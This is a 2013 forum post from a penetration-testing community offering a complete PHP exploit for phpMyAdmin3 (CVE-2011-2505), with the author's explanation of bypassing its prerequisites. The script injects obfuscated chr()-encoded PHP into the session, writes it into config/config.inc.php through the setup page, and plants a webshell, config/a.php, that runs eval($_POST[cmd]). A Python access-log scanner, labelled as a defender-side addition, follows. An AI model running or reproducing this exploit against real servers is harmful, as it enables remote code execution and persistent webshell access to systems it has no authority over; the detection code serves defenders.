中国网络渗透测试联盟

Title: phpMyAdmin3 remote code execute, PHP version of the exploit

Author: admin    Time: 2013-2-21 09:13
I've been a full-time stay-at-home dad lately, out of touch with the scene for many months, and my blog hasn't been updated either.

Last night I was up all night with the baby and saw 黑哥's discussion of the phpMyAdmin3 vulnerability in the php security group. I hadn't read the vulnerable code before, though I had seen wofeiwo's exploit on Weibo a while back; but 黑哥 said there was an exploitation method that isn't "jilei" (chicken ribs, i.e. of little practical use), so I dug out the code that night, studied it, and wrote this reheated exploit. Since I got to it late and plenty of people had already researched it and written exploits, mine is just warmed-over leftovers, merely research to pass the time.

First, props to wofeiwo's Python version of the exploit, and props to the dedication of wofeiwo and superhei; role models to learn from. But the earlier exploit had some restrictions when used:
one, session.auto_start = 1;
two, in the default pma3 code the libraries directory is already blocked from access by .htaccess.
And of course there is a third gap that nobody can cross: the config directory must exist and be writable.

After reading 黑哥's remarks in the group and looking at the code again, I found that the first two restrictions can both be ignored. So this vulnerability really isn't so "jilei" after all.

So I wrote this PHP version of the exploit; the code is as follows:
. g5 B1 q" A+ a  }: t) O8 ?( H+ |$ v& r" G$ ]
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * Works only when the directory "config" exists and is writable.
 **/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory "config" exists
 **/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr = php_request('config/');
// A 404 for config/ means the directory is missing; a 403 (listing denied) means it exists.
if (strpos($returnstr, '404')) {
    exit("[-] Exploit Failed! The directory:config does not exist!\n");
}

/**
 * Try to get token and session id
 **/
echo "[+] Try to get token and sessionid....\n";
$result = php_request('index.php');
// Pull the phpMyAdmin session cookie and the CSRF token out of the login page response.
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token = $resp[3];
$sessionid = $resp[1];
if ($token && $sessionid) {
    echo "[+] token: $token\n";
    echo "[+] Session ID: $sessionid\n";
} else {
    exit("[-] Can't get token and Session ID, Exploit Failed!\n");
}

/**
 * Try to insert shell into session
 **/
echo "[+] Try to insert shell into session....\n";
// CVE-2011-2505: a request carrying session_to_unset lets _SESSION[...] request
// parameters be injected into the server-side session, here under ConfigFile -> Servers.
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net', '', 'phpMyAdmin='.$sessionid);
// Actually, almost all the php files in the home directory of pma3 can be used here.

/**
 * Try to create webshell
 **/
echo "[+] Try to create webshell....\n";
// Submitting "Save" to the setup script writes the poisoned ConfigFile from the session
// into config/config.inc.php.
php_request('setup/config.php', 'phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save', 'phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
 **/
echo "[+] Try to check if the webshell was created successfully....\n";
// Requesting config.inc.php runs the injected code, which prints "t00ls" on success.
$content = php_request('config/config.inc.php');
if (strpos($content, 't00ls')) {
    echo "[+] Congratulations! Exploit succeeded....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
} else {
    exit("[-] Exploit Failed! Perhaps the directory:config does not exist or is not writable!\n");
}

function php_request($url, $data = '', $cookie = '') {
    global $host, $path;

    $method = $data ? 'POST' : 'GET';

    // Build a minimal raw HTTP/1.1 request by hand and send it over a plain socket.
    $packet  = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data ? "Content-Type: application/x-www-form-urlencoded\r\n" : "";
    $packet .= $data ? "Content-Length: ".strlen($data)."\r\n" : "";
    $packet .= $cookie ? "Cookie: $cookie\r\n" : "";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data ? $data : "";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';
    // Read until the server closes the connection (Connection: Close was requested above).
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>
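As an added defender-side example (not part of the original post or of phpMyAdmin), the scanner below flags, in an Apache access log, the request sequence this exploit produces: the session_to_unset + _SESSION[...] injection, the POST to setup/config.php that saves the config, and the follow-up fetch of a PHP file under config/. The log lines are constructed samples; the stage names and severity levels are my own.

```python
import re
from urllib.parse import unquote

# Constructed Apache access-log sample (not real traffic): one client replays the exploit's request sequence, another only hits the setup script.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Feb/2013:09:13:01 +0800] "GET /pma/config/ HTTP/1.1" 403 199 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Feb/2013:09:13:02 +0800] "GET /pma/index.php HTTP/1.1" 200 8812 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Feb/2013:09:13:03 +0800] "GET /pma/db_create.php?token=abc&session_to_unset=x&_SESSION%5BConfigFile%5D%5BServers%5D%5B*/eval(1)%3B/*%5D%5Bhost%5D=t00ls.net HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Feb/2013:09:13:04 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 301 "-" "Mozilla/4.0"
203.0.113.5 - - [21/Feb/2013:09:13:05 +0800] "GET /pma/config/config.inc.php HTTP/1.1" 200 5 "-" "Mozilla/4.0"
198.51.100.7 - - [21/Feb/2013:09:14:00 +0800] "GET /pma/index.php HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Feb/2013:09:14:05 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 301 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

def classify_request(method, target):
    """Map one request to an exploit stage name, or None if it looks benign."""
    path, _, query = target.partition('?')
    decoded = unquote(query)
    # Stage 1: session_to_unset together with _SESSION[...] in the query is the CVE-2011-2505 session write.
    if 'session_to_unset=' in decoded and '_SESSION[' in decoded:
        return 'session_injection'
    # Stage 2: the setup script being asked to save config/config.inc.php.
    if method == 'POST' and path.endswith('/setup/config.php'):
        return 'setup_save'
    # Stage 3: a PHP file under config/ fetched directly (runs the written file, or a dropped shell).
    if method == 'GET' and re.search(r'/config/[^/]+\.php$', path):
        return 'config_php_fetch'
    return None

def scan_log(text):
    """Return {client_ip: [stages, in order of first appearance]} for clients that hit any stage."""
    stages = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        stage = m and classify_request(m['method'], m['target'])
        if stage and stage not in stages.setdefault(m['ip'], []):
            stages[m['ip']].append(stage)
    return stages

def verdict(stages):
    """Severity for one client: the session write alone is enough to alert on."""
    if 'session_injection' in stages:
        return 'high'
    if 'setup_save' in stages and 'config_php_fetch' in stages:
        return 'medium'
    return 'low' if stages else 'none'
```

A hit on the setup script alone is only worth a look, but any request that writes into the session this way warrants checking whether config/ exists, is writable, and contains files the installation did not ship.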
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2